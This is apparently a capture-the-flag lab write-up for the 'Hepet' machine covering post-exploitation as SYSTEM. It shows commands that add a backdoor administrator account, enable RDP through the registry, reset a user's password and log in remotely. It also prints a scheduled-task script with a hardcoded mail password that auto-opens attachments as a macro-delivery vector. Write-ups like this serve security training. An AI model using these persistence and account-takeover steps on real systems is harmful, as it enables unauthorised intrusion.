Beyond

This is the beyond page that an additional post enumeration and assessment are conducted as SYSTEM after compromising the target system.

C:\WINDOWS\system32> net user adm1n qwe123 /ADD && net localgroup administrators /ADD adm1n
 
The command completed successfully.
The command completed successfully.
 
C:\WINDOWS\system32> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
 
The operation completed successfully.

Adding admin user and enabling RDP

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hepet]
└─$ xfreerdp /u:adm1n /p:'qwe123' /v:$IP /cert:ignore /dynamic-resolution /tls-seclevel:0

The ela arwel user had an on-going session as previously enumerated

Scheduled Task

\Check Email running as ela arwel, executing the C:\Users\Ela Arwel\check_email.ps1 file with an interval of 3 minutes

`C:\Users\Ela Arwel\check_email.ps1`

PS C:\WINDOWS\system32> cat "C:\Users\Ela Arwel\check_email.ps1"
### Close everything
Remove-Item -Path 'C:\Users\Ela Arwel\Desktop\email_files\*'
Stop-Process -Name 'soffice.*'
 
### Import the dll
[Reflection.Assembly]::LoadFile("C:\ImapX.dll")
 
### Create a client object
$client = New-Object ImapX.ImapClient
 
###set the fetching mode to retrieve the part of message you want to retrieve,
###the less the better
 
$client.Behavior.MessageFetchMode = "Full"
$client.Host = "localhost"
$client.Port = 143
$client.Connect()
 
$user = "mailadmin"
$password = "7vRx1jii9"
$client.Login($user,$password)
 
$client.Behavior.AutoPopulateFolderMessages = $true
 
$messages = $client.Folders.Inbox.Search("ALL", $client.Behavior.MessageFetchMode, 1000)
 
if ($messages.Count -gt 0) {
    foreach($m in $messages){
        $m.Subject
 
        foreach($r in $m.Attachments){
            $r.Download()
            $r.Save('C:\Users\Ela Arwel\Desktop\email_files\')
        }
        $m.Remove();
    }
    Invoke-Item 'C:\Users\Ela Arwel\Desktop\email_files\*.xls'
    Invoke-Item 'C:\Users\Ela Arwel\Desktop\email_files\*.ods'
}
$client.Logout();

This PowerShell script connects to a local IMAP email server, retrieves emails, downloads their attachments, and opens specific file types. Here’s what it does step by step:

Cleanup
- Deletes all files in C:\Users\Ela Arwel\Desktop\email_files\.
- Closes any running instances of LibreOffice (soffice.*).
IMAP Connection Setup
- Loads the ImapX.dll library for handling IMAP communication.
- Creates an IMAP client object.
- Sets the email retrieval mode to “Full” (fetching complete messages).
- Connects to the IMAP server at localhost:143.
- Logs in with the username mailadmin and password 7vRx1jii9.
Email Processing
- Enables automatic fetching of messages.
- Retrieves up to 1000 emails from the Inbox.
- If there are emails:
  - Iterates through them, displaying the subject line.
  - Downloads all attachments and saves them to C:\Users\Ela Arwel\Desktop\email_files\.
  - Deletes the processed emails from the inbox.
File Execution
- Opens any downloaded .xls (Excel) or .ods (OpenDocument Spreadsheet) files.
Logout
- Logs out from the IMAP server.

Execution

This was extremely unreliable

It still fails to work when even manually run the \Check Email task

PS C:\Users\Ela Arwel\Desktop\email_files> Invoke-Item .\*.ods

It does work once the macro security is manually set to Low This required opening up the LibreOffice for the first time

XAMPP

The target system has an Apache XAMPP instance configured to host both FileZilla and Mercury

Mercury

Veyon

Veyon (Virtual Eye On Networks) is a free and open source software for monitoring and controlling computers across multiple platforms. Veyon supports users in teaching in digital learning environments, performing virtual trainings or giving remote support. It uses VNC protocol and the target system runs it over the port 11100

Troubleshooting

PS C:\Users\Ela Arwel\Veyon> mv veyon-service.exe.bak veyon-service.exe
PS C:\Users\Ela Arwel\Veyon> cmd /c sc stop VeyonService && sc start VeyonService
 
SERVICE_NAME: VeyonService 
        TYPE               : 10  WIN32_OWN_PROCESS  
        STATE              : 2  START_PENDING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x1
        WAIT_HINT          : 0x3a98
        PID                : 7388
        FLAGS              :

Restoring the original veyon-service.exe file and restarting the VeyonService service

C:\Users\Ela Arwel> net user "ela arwel" qwe123
The command completed successfully.

Resetting password of the ela arwel user

Starting the master application The ela arwel user had an on-going session. The user might have used this software to enable the macro

Indeed. Establishing a RDP session as the admin account kicked the ela arwel user out of the session That might be the reason why the scheduled task wasn’t executing

Logonscript

PS C:\Users\Ela Arwel\Veyon> ls "C:\Users\ela arwel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
 
 
    Directory: C:\Users\ela arwel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
 
 
Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----        10/16/2020   9:25 PM           1227 LibreOffice 7.0.lnk                                                  
-a----        10/16/2020   8:33 PM            671 XAMPP Control Panel.lnk      
 
PS C:\Users\Ela Arwel\Veyon> cat "C:\Users\ela arwel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LibreOffice 7.0.lnk"
 
LAF> 
     f݀-�A�#�
            f݀-�0UP�OD �:i�+00?/C:\O1QQ�	PROGRA~1t	�_sN-&QQ�	.BJ$�Program Files@shell32.dll,-21781`1QQD	LIBREO~1H	�_QQ�	QQD	.4��LibreOfficeV1QQx	program@	�_QQ�	QQx.O`�programj20AQj> QUICKS~1.EXEN	�_AQj>QQI	.�<quickstart.exeb-�C:\Program Files\LibreOffice\program\quickstart.exeK..\..\..\..\..\..\..\..\..\Program Files\LibreOffice\program\quickstart.exe$C:\Program Files\LibreOffice\program�&1
                                          �c^?�ANI�oe�2OO␦1`�Xdesktop-9jmd4toO�d#�~TAY_�??p|z	7s�Y�PVSd^O�d#�~TAY_�??p|z	7s�Y�PVSd^I	�%1SPS�SXF�L8C��"&~mIm.S-1-5-21-242175207-3260895204-4250494957-100191SPS�mD-?pHH@.=xOhHZs�?4|F_cU�?
 
PS C:\Users\Ela Arwel\Veyon> cat "C:\Users\ela arwel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XAMPP Control Panel.lnk"
 
LAFY x�>�␦�,@�␦����-f3�P�OD �:i�+00?/C:\P1QQ
xampp<	�_QQ�QQ
.�Zvxamppp2f3�NTa XAMPP-~1.EXET	�_QQ�QQ�.Oxampp-control.exeI-�C:\xampp\xampp-control.exeXAMPP Control Panel␦..\xampp\xampp-control.eC:\xampp`�Xdesktop-9jmd4toO�d#�~TAY_�??p|zT%xO
�YoPVSd^O�d#�~TAY_�??p|zT%xO
�YoPVSd^E	�91SPS�mD-?pHH@.=xOhHZs�?4|F_cU�?

There are 2 link file configured for the ela arwel user

PS C:\Users\Ela Arwel\Veyon> net user "ela arwel" qwe123 && net localgroup "Remote Desktop Users" /ADD "ela arwel"
 
The command completed successfully.
The command completed successfully.
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hepet]
└─$ xfreerdp /u:"ela arwel" /p:'qwe123' /v:$IP /cert:ignore /dynamic-resolution /tls-seclevel:0

Indeed. The ela arwel user already had an on-going session with a couple windows opened, executing something

The LibreOffice document recovery window shows that the program had crashed. This may be the reason why it wasn’t executing. Upon closing the Windows, the scheduled task runs normally and executed my payloads

InfoSec LAB

Explorer

Hepet_Beyond